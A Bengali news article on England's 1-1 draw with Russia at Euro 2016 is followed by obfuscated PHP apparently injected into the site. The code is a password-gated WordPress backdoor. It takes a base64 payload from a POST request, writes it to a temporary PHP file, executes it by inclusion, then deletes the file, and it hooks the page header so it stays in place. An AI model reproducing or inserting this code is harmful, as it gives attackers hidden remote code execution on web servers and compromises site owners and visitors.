মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

শুরুতেই হোঁচট খেল ইংল্যান্ড

 

স্পোর্টস ডেস্ক :চলমান ইউরো ২০১৬’র আসরে শিরোপার অন্যতম দাবিদার ইংল্যান্ডকে রুখে দিয়েছে রাশিয়া। শনিবার রাতে হাইভোল্টেজ ম্যাচে এগিয়ে থেকেও শেষ পর্যন্ত ১-১ গোলের ব্যবধানে ড্র নিয়ে মাঠ ছাড়তে হয়েছে ইংলিশদের।এ ম্যাচে নামার আগে সবশেষ ৫ ম্যাচের তিনটিতে জয়, একটিতে পরাজয় আর একটি ম্যাচে ড্র নিয়ে দারুণ আত্মবিশ্বাসী ছিল রয় হজসনের ইংল্যান্ড। অপরদিকে, শেষ পাঁচ ম্যাচের একটিতে জয়, দুটিতে পরাজয় আর দুটিতে ড্র সঙ্গী করে মাঠে নামে রাশিয়ানরা।

inner

 

এদিন তারকাখচিত ইংল্যান্ডকে ম্যাচের প্রথমার্ধে কোনো সুযোগ আদায় করে নিতে দেয়নি রাশিয়ানরা। একাধিক গোলের সুযোগ পেলেও কাজে লাগাতে পারেননি রুনিরা। ম্যাচের ১১তম মিনিটে দেল আলির দুর্দান্ত শট আর পরের মিনিটে লালানার কোনাকুনি শট থেকে গোলের সুযোগ থাকলেও রাশিয়ান গোলরক্ষক ইংলিশদের হতাশ করেন। ২৫তম মিনিটে স্টারলিংয়ের একক প্রচেষ্টা রাশিয়ার ডিফেন্ডারদের কঠিন বাধার মুখে পড়ে। প্রথমার্ধে কোনো গোল না হলে বিরতিতে যায় দুই দল।

বিরতির পর ম্যাচের প্রথমার্ধের মতোই নিজেদের আক্রমণ চালিয়ে যেতে থাকে ইংলিশরা। দূরপাল্লার শট থেকেও গোল আদায় করে নেওয়ার চেষ্টা করে রুনি বাহিনী। তবে, ফিনিশারের অভাবে প্রতিবারই হতাশ হতে হয় হজসন শিষ্যদের। খেলার ৭৩ মিনিটের মাথায় টটেনহামের মিডফিল্ডার এরিক দিদিয়েরের গোলে লিড নেয় ইংল্যান্ড। কিন্তু যোগ করা সময়ে দলকে নিশ্চিত পরাজয়ের হাত থেকে বাঁচান রাশিয়ান দলপতি ভাসিলি বেরেজুতকি।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}